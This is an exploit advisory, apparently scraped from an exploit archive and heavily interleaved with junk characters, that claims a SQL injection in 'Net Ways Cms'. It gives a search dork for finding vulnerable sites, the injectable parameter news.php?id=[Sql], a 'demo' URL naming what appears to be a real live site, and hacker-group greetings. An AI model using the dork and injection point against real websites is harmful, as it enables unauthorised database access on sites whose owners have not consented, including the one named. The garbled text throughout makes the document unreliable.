################################################################################??######## # s2 X+ k. d4 ~( b
# ( ]4 O9 b2 j* ^; ^+ _( X* f
# Exploit Title : Net Ways Cms Sql Injection Vulnerability ; }5 ^5 d. Q# n I' v. I
#
& j- n! |. U N5 T; K# Author : IrIsT.Ir & d3 l1 f9 s \7 c1 l
# ( {, `, ~9 j, ~. c" d$ ^5 s
# Discovered By : Am!r 6 r( E# w& z# j) `5 r( Q& @
# - g) r9 ^$ K3 s- y8 R" ]. H
# Home : http://IrIsT.Ir/forum
# |( |* M- x1 F; Q3 J# " ]3 G" X/ u8 A* s' H3 s
# Software Link : http://www.netways.com/ www.political-security.com3 R( ?, o# `3 \# t
# " D | }9 }1 {
# Security Risk : High
2 d" } @1 Y/ Z1 d' Z1 l#
3 w( p& A! I- T# Version : All Version
3 M) G+ i, |8 Q: ?8 y4 u#
4 R" I }1 J$ r6 t" ` o# Tested on : GNU/Linux Ubuntu - Windows Server - win7
% B' \0 u7 [! x& x# - |8 `1 j6 x B. l0 u
# Dork : intext:"Designed & developed by NetWays"
" @$ B3 S( ]! |* I! k% l, O# ]# ]#
7 [6 {9 P$ C& ^, f################################################################################??######## ^$ y9 K- m: _- e+ J9 e
# 9 v( d8 S1 H$ b+ p3 o4 i
# Expl0iTs :
z. W5 a, A- ?& J& S( S+ R#
; [ u1 S7 l+ k$ P# http://target.com/news.php?id=[Sql]
3 `) N' n+ G5 N7 Q! Q& ?2 W#
: X i% r6 D: n% C: c) f#
% y& I3 u. q, q5 J! P( X! |1 i# D3mo :
2 J/ n; Z& e, h2 k7 z#
/ N5 U, y- f& A' U8 L9 i0 a# http://compagnieparento.com/news.php?id=7[Sql]
^: L0 X& X, b; O7 H3 N5 d/ A#
" n$ m/ S3 m- M7 O# V; f################################################################################??######## $ R* f' w5 f& }" J, k
# 3 z5 O1 L; r: t/ d
# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r |. a$ M6 @& _: }" y2 c
# + O5 X# m6 b# \* e2 G
# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r . R" J2 R$ B& F! [& J; L6 f# ^
#
) _5 r/ p" p- K6 u# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum % l8 z# |7 [6 Q/ M/ O
#
; U% m7 }$ q) Y% l# K################################################################################??######## |